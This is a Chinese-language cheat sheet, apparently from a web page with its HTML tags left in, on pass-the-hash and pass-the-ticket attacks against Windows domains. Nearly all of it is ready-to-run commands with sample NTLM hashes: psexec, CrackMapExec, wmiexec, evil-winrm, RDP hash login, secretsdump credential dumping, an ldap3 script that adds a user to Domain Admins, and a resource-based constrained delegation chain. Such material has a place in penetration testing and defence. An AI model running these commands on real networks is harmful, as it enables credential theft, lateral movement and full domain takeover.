传递哈希(PTH)的多种利用方式详解<\/h1>

1. 传统PTH方法<\/h2>

1.1 Metasploit中的PTH<\/h3>
msf > use exploit\/windows\/smb\/psexec
<\/span><\/span>msf exploit(<\/span>psexec)<\/span> > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
<\/span><\/span>msf exploit(<\/span>psexec)<\/span> > exploit
<\/span><\/span><\/code><\/pre>1.2 CrackMapExec工具<\/h3>
cme smb 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79 -d domain.local
<\/span><\/span><\/code><\/pre>1.3 Impacket工具集<\/h3>
wmiexec.py domain.local\/user@10.0.0.20 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79
<\/span><\/span><\/code><\/pre>2. WinRM传递哈希<\/h2>
2.1 使用evil-winrm<\/h3>
ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
<\/span><\/span><\/code><\/pre>2.2 适用场景<\/h3>

SMB端口关闭或被终端保护阻止时<\/li>
使用5985(HTTP)或5986(HTTPS)端口<\/li>
<\/ul>
3. RDP传递哈希<\/h2>
3.1 启用受限管理模式<\/h3>
cme smb 10.0.0.200 -u Administrator -H 8846F7EAEE8FB117AD06BDD830B7586C -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa \/t REG_DWORD \/v DisableRestrictedAdmin \/d 0x0 \/f'<\/span>
<\/span><\/span><\/code><\/pre>3.2 使用xfreerdp连接<\/h3>
xfreerdp \/v:192.168.2.200 \/u:Administrator \/pth:8846F7EAEE8FB117AD06BDD830B7586C
<\/span><\/span><\/code><\/pre>4. SMBClient传递哈希<\/h2>
4.1 基本用法<\/h3>
smbclient \/\/10.0.0.30\/Finance -U user --pw-nt-hash BD1C6503987F8FF006296118F359FA79 -W domain.local
<\/span><\/span><\/code><\/pre>4.2 适用场景<\/h3>

访问非管理权限的文件共享<\/li>
需要类似FTP的交互式界面<\/li>
<\/ul>
5. LDAP传递哈希<\/h2>
5.1 获取计算机账户哈希<\/h3>
secretsdump.py ituser@10.0.0.40 -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79
<\/span><\/span><\/code><\/pre>5.2 使用ldap3进行LDAP操作<\/h3>
import<\/span> ldap3
<\/span><\/span>user =<\/span> 'DOMAIN<\/span>\\<\/span>EXCHANGE$'<\/span>
<\/span><\/span>password =<\/span> 'aad3b435b51404eeaad3b435b51404ee:6216d3268ba7634e92313c8b60293248'<\/span>
<\/span><\/span>server =<\/span> ldap3.<\/span>Server('DOMAIN.LOCAL'<\/span>)
<\/span><\/span>connection =<\/span> ldap3.<\/span>Connection(server, user=<\/span>user, password=<\/span>password, authentication=<\/span>NTLM)
<\/span><\/span>connection.<\/span>bind()
<\/span><\/span>
<\/span><\/span>from<\/span> ldap3.extend.microsoft.addMembersToGroups import<\/span> ad_add_members_to_groups as<\/span> addUsersInGroups
<\/span><\/span>user_dn =<\/span> 'CN=IT User,OU=Standard Accounts,DC=domain,DC=local'<\/span>
<\/span><\/span>group_dn =<\/span> 'CN=Domain Admins,CN=Users,DC=domain,DC=local'<\/span>
<\/span><\/span>addUsersInGroups(connection, user_dn, group_dn)
<\/span><\/span><\/code><\/pre>6. 传递票据(Pass the Ticket, PtT)<\/h2>
6.1 获取Kerberos票据<\/h3>
python3 getTGT.py -hashes aad3b435b51404eeaad3b435b51404ee:B65039D1C0359FA797F88FF06296118F domain.local\/user
<\/span><\/span><\/code><\/pre>6.2 设置票据环境<\/h3>
cp user.ccache \/tmp\/krb5cc_0
<\/span><\/span>export KRB5CCNAME=<\/span>\/tmp\/krb5cc_0
<\/span><\/span><\/code><\/pre>6.3 验证票据<\/h3>
klist
<\/span><\/span><\/code><\/pre>7. 挂载共享使用Kerberos票据<\/h2>
7.1 挂载命令<\/h3>
sudo mount -t cifs -o sec=<\/span>krb5,vers=<\/span>3.0 '\/\/SERVER.DOMAIN.LOCAL\/SHARE'<\/span> \/mnt\/share
<\/span><\/span><\/code><\/pre>8. SSH使用Kerberos票据<\/h2>
8.1 SSH连接<\/h3>
ssh -o GSSAPIAuthentication=<\/span>yes user@domain.local
<\/span><\/span><\/code><\/pre>8.2 设置票据<\/h3>
cp user.ccache \/tmp\/krb5cc_1045
<\/span><\/span><\/code><\/pre>9. 基于资源的约束委派(RBCD)攻击链<\/h2>
9.1 获取计算机账户哈希<\/h3>
secretsdump.py ituser@PC01.domain.local -hashes aad3b435b51404eeaad3b435b51404ee:BD1C6503987F8FF006296118F359FA79
<\/span><\/span><\/code><\/pre>9.2 修改msDS-AllowedToActOnBehalfOfOtherIdentity属性<\/h3>
python3 rbcd.py -u PC01$ -H aad3b435b51404eeaad3b435b51404ee:6216d3268ba7634e92313c8b60293248 -t 'CN=PC02,CN=Computers,DC=domain,DC=local'<\/span> -d domain.local -c 'CN=PC01,CN=Computers,DC=domain,DC=local'<\/span> -l DC1.domain.local
<\/span><\/span><\/code><\/pre>9.3 获取服务票据<\/h3>
getST.py -spn cifs\/PC02 -hashes aad3b435b51404eeaad3b435b51404ee:6216d3268ba7634e92313c8b60293248 -impersonate DA domain.local\/PC01\$<\/span>
<\/span><\/span><\/code><\/pre>关键注意事项<\/h2>

使用Kerberos身份验证时，必须使用目标的DNS名称而非IP地址<\/li>
受限管理模式默认禁用，需要先通过其他方式启用<\/li>
Linux系统需要正确配置Kerberos环境<\/li>
票据文件需要放置在正确的路径(\/tmp\/krb5cc_UID)<\/li>
时间同步对Kerberos认证至关重要<\/li>
<\/ol>